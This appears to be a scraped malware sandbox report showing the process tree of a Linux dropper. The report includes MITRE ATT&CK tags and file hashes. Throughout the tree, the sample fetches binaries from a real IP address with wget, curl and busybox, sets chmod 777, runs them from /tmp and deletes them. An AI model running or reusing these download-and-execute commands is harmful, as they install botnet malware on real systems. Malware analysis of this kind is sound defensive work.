/usr/bin/wgetwget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:1645
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:1647
-
-
/bin/chmodchmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- File and Directory Permissions Modification
PID:1648
-
-
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Executes dropped EXE
PID:1649
-
-
/bin/rmrm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:1650
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:1651
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Writes file to tmp directory
PID:1652
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:1653
-
-
/bin/chmodchmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- File and Directory Permissions Modification
PID:1654
-
-
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Executes dropped EXE
PID:1655
-
-
/bin/rmrm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:1656
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:1657
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Writes file to tmp directory
PID:1658
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:1659
-
-
/bin/chmodchmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- File and Directory Permissions Modification
PID:1660
-
-
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Executes dropped EXE
PID:1661
-
-
/bin/rmrm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:1662
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:1663
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Writes file to tmp directory
PID:1664
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:1665
-
-
/bin/chmodchmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Executes dropped EXE
PID:1667
-
-
/bin/rmrm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:1668
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:1669
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Writes file to tmp directory
PID:1670
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:1671
-
-
/bin/chmodchmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- File and Directory Permissions Modification
PID:1672
-
-
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Executes dropped EXE
PID:1673
-
-
/bin/rmrm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:1674
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:1675
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1676
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:1677
-
-
/bin/chmodchmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- File and Directory Permissions Modification
PID:1678
-
-
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1679
-
-
/bin/rmrm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:1680
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:1681
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Writes file to tmp directory
PID:1682
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:1683
-
-
/bin/chmodchmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- File and Directory Permissions Modification
PID:1684
-
-
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Executes dropped EXE
PID:1685
-
-
/bin/rmrm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:1686
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:1687
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Writes file to tmp directory
PID:1688
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:1691
-
-
/bin/chmodchmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- File and Directory Permissions Modification
PID:1692
-
-
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Executes dropped EXE
PID:1693
-
-
/bin/rmrm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:1694
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:1695
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Writes file to tmp directory
PID:1696
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:1697
-
-
/bin/chmodchmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- File and Directory Permissions Modification
PID:1698
-
-
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Executes dropped EXE
PID:1699
-
-
/bin/rmrm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:1700
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97